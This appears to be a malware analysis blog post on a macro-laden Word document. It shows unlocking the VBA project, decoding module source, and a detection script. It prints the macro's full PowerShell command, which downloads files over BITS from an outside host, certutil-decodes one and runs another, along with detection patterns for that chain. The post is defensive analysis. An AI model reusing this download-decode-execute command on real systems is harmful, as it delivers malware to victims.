Word Macro Malware Analysis

Hash: 98fe0b166f550446cbf9e0f368eb8bea79d2eec29fa033cee1ff8f8e38a12836

Sample Download Source: beta.virusbay.io

File Type: Microsoft Word Document

File Format: .doc

VirusTotal Score: 32/62

Document Preview:


File Properties:

cmd> olemeta.py <filename>

Document Macro Analysis:

cmd> olevba.py -a <filename>

olevba flags a Document_Open macro, which runs automatically as soon as the document is opened.


The first thing I tried was to access the macro. Macros are disabled by default; to enable them, go to File > Options > Trust Center > Trust Center Settings > Macro Settings, select "Enable all macros" and tick "Trust access to the VBA project object model". Do this only inside an isolated analysis VM, because the Document_Open macro will run the moment the document is opened.


After enabling macros, I navigated to View > Macros > View Macros.

There are macros in the document.


I tried to step into the Document_Open macro, which executes when the document is opened, but got the errors "Project Locked" and "Project is unviewable".


To make it viewable, I downloaded EvilClippy. The tool creates a new copy of the Word document, with the VBA project made viewable again, in the same directory as the original.


When I opened the new copy with the viewable project, opened the VBA editor with Alt+F11 and tried to open the macro code, I got a Project Password prompt.


To remove/bypass this password there is a VBA snippet (GitHub link).

I created a new module, pasted that code in and ran it, which unprotected the project.
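A caveat worth adding at this point: the project lock, the "unviewable" flag that EvilClippy toggles and the project password only control what the VBA editor will show. Word stores each module's source in its own OLE stream, compressed with the algorithm described in MS-OVBA section 2.4.1, and that is what olevba decoded at the start of this post without touching the password at all. The Python below is an added example, not code from the original post or from olevba: it implements that decompression and runs it over a constructed container. The module_source_text helper, its text_offset parameter and the cp1252 default are illustrative assumptions; in a real document the offset comes from the MODULEOFFSET record of the dir stream and the code page from PROJECTCODEPAGE.

```python
import struct

# Added example (not the page's code): a pure-Python decoder for the MS-OVBA 2.4.1
# compression used for VBA module source and the dir stream. Recovering source this
# way works whether or not the VBA project is locked, "unviewable" or password protected.


def _copytoken_bits(decompressed_current, chunk_start):
    """Width in bits of the offset field of a copy token (MS-OVBA "CopyToken Help").

    It depends only on how far into the current decompressed chunk we are:
    BitCount = max(ceil(log2(Difference)), 4). (n - 1).bit_length() equals
    ceil(log2(n)) for n >= 1, which avoids floating point.
    """
    difference = decompressed_current - chunk_start
    if difference < 1:
        raise ValueError("a copy token cannot be the first token of a chunk")
    return max((difference - 1).bit_length(), 4)


def decompress_stream(container):
    """Decompress an MS-OVBA CompressedContainer (bytes) and return the plaintext."""
    if not container or container[0] != 0x01:
        raise ValueError("bad container signature (expected 0x01)")
    out = bytearray()
    pos = 1
    while pos < len(container):
        (header,) = struct.unpack_from("<H", container, pos)
        chunk_size = (header & 0x0FFF) + 3          # header plus data, in bytes
        if (header >> 12) & 0x07 != 0b011:
            raise ValueError("bad chunk signature at offset %d" % pos)
        is_compressed = (header >> 15) & 0x01
        chunk_end = min(len(container), pos + chunk_size)
        pos += 2
        if not is_compressed:
            # Raw chunk: 4096 bytes stored verbatim.
            out += container[pos:pos + 4096]
            pos += 4096
            continue
        chunk_start = len(out)
        while pos < chunk_end:
            flags = container[pos]          # one flag bit per token, LSB first
            pos += 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:
                    out.append(container[pos])   # literal byte
                    pos += 1
                    continue
                # Copy token: back-reference into data already produced.
                (token,) = struct.unpack_from("<H", container, pos)
                pos += 2
                bits = _copytoken_bits(len(out), chunk_start)
                length_mask = 0xFFFF >> bits
                length = (token & length_mask) + 3
                offset = ((token & (0xFFFF ^ length_mask)) >> (16 - bits)) + 1
                src = len(out) - offset
                if src < 0:
                    raise ValueError("copy token points before the start of the data")
                for i in range(length):          # byte-wise: the run may overlap itself
                    out.append(out[src + i])
    return bytes(out)


def module_source_text(module_stream, text_offset, codepage="cp1252"):
    """Recover a module's source from its OLE stream (illustrative helper).

    Per MS-OVBA 2.3.4.3 the stream is PerformanceCache (TextOffset bytes, taken
    from the dir stream's MODULEOFFSET record) followed by the compressed source.
    cp1252 is an assumed default; the real code page is PROJECTCODEPAGE in dir.
    """
    return decompress_stream(module_stream[text_offset:]).decode(codepage)


# Constructed sample, not data from the analysed document: one compressed chunk
# whose token stream is eight literals "ABCDEFGH" followed by a single copy token
# (offset 8, length 4), so it decompresses to b"ABCDEFGHABCD".
SAMPLE_CONTAINER = (
    bytes([0x01])                   # container signature
    + bytes([0x0B, 0xB0])           # chunk header 0xB00B: size 14, signature 0b011, compressed
    + bytes([0x00]) + b"ABCDEFGH"   # flag byte 0 = eight literals
    + bytes([0x01, 0x01, 0x70])     # flag byte 1 = one copy token 0x7001
)

if __name__ == "__main__":
    print(decompress_stream(SAMPLE_CONTAINER))
```

To apply this to a real sample, read the module stream out of the OLE file (olefile does this), slice it at the TextOffset from the dir stream, and hand the rest to decompress_stream; a copy token is decoded relative to the 4096-byte chunk it sits in, which is why the bit width is recomputed for every token.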


Debugging Macro

I started debugging the macro code and found that the code below runs a PowerShell command.


The PowerShell command is written to C:\Users\<profile>\AppData\Roaming\Temp\


The PowerShell command that is executed via the command line:

powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://neoneo-bg.site/hIeak.dat,http://neoneo-bg.site/geTask.dat,http://neoneo-bg.site/rTTj.dat -Destination \"$env:TEMP\vido.com\",\"$env:TEMP\sfera\",\"$env:TEMP\rTTj.com\"; Set-Location -Path \"$env:TEMP\"; certutil -decode sfera po15p; Start-Process vido.com -ArgumentList po15p

PowerShell fetches the three .dat files from the URLs in the command over BITS and saves them as vido.com, sfera and rTTj.com in %TEMP% (C:\Users\<user>\AppData\Local\Temp). It then changes into that directory, base64-decodes sfera with certutil into a file named po15p, and starts vido.com with po15p as its argument.

I tried to follow the PowerShell stage further, but the URLs are no longer reachable, so I could not download the files the script would have fetched.
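The command above is also a compact detection and triage target. As an added example (not part of the original write-up), the Python below takes the command line as a process-creation log would record it, unescapes the quotes, pairs each Start-BitsTransfer source with its destination, pulls out the certutil decode and Start-Process steps, and flags the behaviours a detection rule would key on. The sample input is the command from this post; $env:TEMP is deliberately left unexpanded, since the victim's environment resolves it.

```python
import ntpath
import posixpath
import re
from urllib.parse import urlparse

# Constructed input: the command line from the macro as process-creation logging
# (Sysmon Event ID 1 / Security 4688) would record it, cmd.exe-style \" escapes included.
SAMPLE_CMDLINE = (
    r'powershell -windowstyle hidden -command Import-Module BitsTransfer; '
    r'Start-BitsTransfer -Source http://neoneo-bg.site/hIeak.dat,'
    r'http://neoneo-bg.site/geTask.dat,http://neoneo-bg.site/rTTj.dat '
    r'-Destination \"$env:TEMP\vido.com\",\"$env:TEMP\sfera\",\"$env:TEMP\rTTj.com\"; '
    r'Set-Location -Path \"$env:TEMP\"; certutil -decode sfera po15p; '
    r'Start-Process vido.com -ArgumentList po15p'
)

# Behaviours worth a detection rule, with the pattern that catches each.
INDICATORS = [
    ("hidden PowerShell window", r"-w(?:indowstyle)?\s+hidden"),
    ("download via BITS (Start-BitsTransfer)", r"\bStart-BitsTransfer\b"),
    ("certutil used as a base64 decoder", r"\bcertutil(?:\.exe)?\s+-decode\b"),
    ("Start-Process launching a dropped file", r"\bStart-Process\b"),
    ("files written under %TEMP%", r"\$env:TEMP"),
]
EXEC_EXTENSIONS = {".com", ".exe", ".scr", ".pif", ".bat", ".cmd"}

# Tokens run up to whitespace or ';', so quoted paths containing spaces would
# need a real tokenizer; the sample has none.
BITS_RE = re.compile(r"Start-BitsTransfer\s+-Source\s+([^\s;]+)\s+-Destination\s+([^\s;]+)", re.I)
CERTUTIL_RE = re.compile(r"certutil(?:\.exe)?\s+-decode\s+([^\s;]+)\s+([^\s;]+)", re.I)
START_RE = re.compile(r"Start-Process\s+([^\s;]+)(?:\s+-ArgumentList\s+([^\s;]+))?", re.I)


def _split_list(arg):
    """Split a PowerShell comma-separated argument; items may be double-quoted."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|([^,"]+)', arg)]


def analyze_cmdline(cmdline):
    """Return IOCs and behavioural indicators extracted from a downloader command line."""
    cmd = cmdline.replace('\\"', '"')       # undo cmd.exe quote escaping
    report = {"indicators": [], "urls": [], "hosts": [], "drops": {}, "decodes": [], "launches": []}
    for name, pattern in INDICATORS:
        if re.search(pattern, cmd, re.IGNORECASE):
            report["indicators"].append(name)
    m = BITS_RE.search(cmd)
    if m:
        sources, dests = _split_list(m.group(1)), _split_list(m.group(2))
        if len(dests) == 1 and len(sources) > 1:
            # A single destination is a directory; files keep their remote names.
            dests = [ntpath.join(dests[0], posixpath.basename(urlparse(s).path)) for s in sources]
        if len(sources) != len(dests):
            raise ValueError("Start-BitsTransfer source/destination count mismatch")
        report["urls"] = sources
        report["hosts"] = sorted({urlparse(u).hostname for u in sources})
        report["drops"] = dict(zip(sources, dests))
        # A .dat on the server that lands as .com/.exe locally is a renamed executable.
        for src, dst in report["drops"].items():
            src_name = posixpath.basename(urlparse(src).path)
            dst_name = ntpath.basename(dst)
            dst_ext = ntpath.splitext(dst_name)[1].lower()
            if dst_ext in EXEC_EXTENSIONS and posixpath.splitext(src_name)[1].lower() != dst_ext:
                report["indicators"].append("%s renamed to executable %s on download" % (src_name, dst_name))
    report["decodes"] = [(d.group(1), d.group(2)) for d in CERTUTIL_RE.finditer(cmd)]
    report["launches"] = [(p.group(1), p.group(2)) for p in START_RE.finditer(cmd)]
    return report


if __name__ == "__main__":
    for key, value in analyze_cmdline(SAMPLE_CMDLINE).items():
        print(key, "->", value)
```

The drops mapping is what gives the stage-two chain its meaning: geTask.dat becomes sfera, which certutil decodes to po15p, and hIeak.dat becomes vido.com, which is then started with po15p as its argument. Feeding the same function other PowerShell command lines from your process logs is a cheap way to surface the download-decode-execute pattern even when the URLs are dead.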


VirusTotal Score: 5/71



VirusTotal Score: 7/71



VirusTotal Score: 5/71



  • On opening the document, the Word macro executes a PowerShell command.
  • The PowerShell command downloads three files into the Temp folder over BITS, base64-decodes one of them with certutil and executes another with the decoded file as its argument.

Thank you. Please post comments for suggestions.
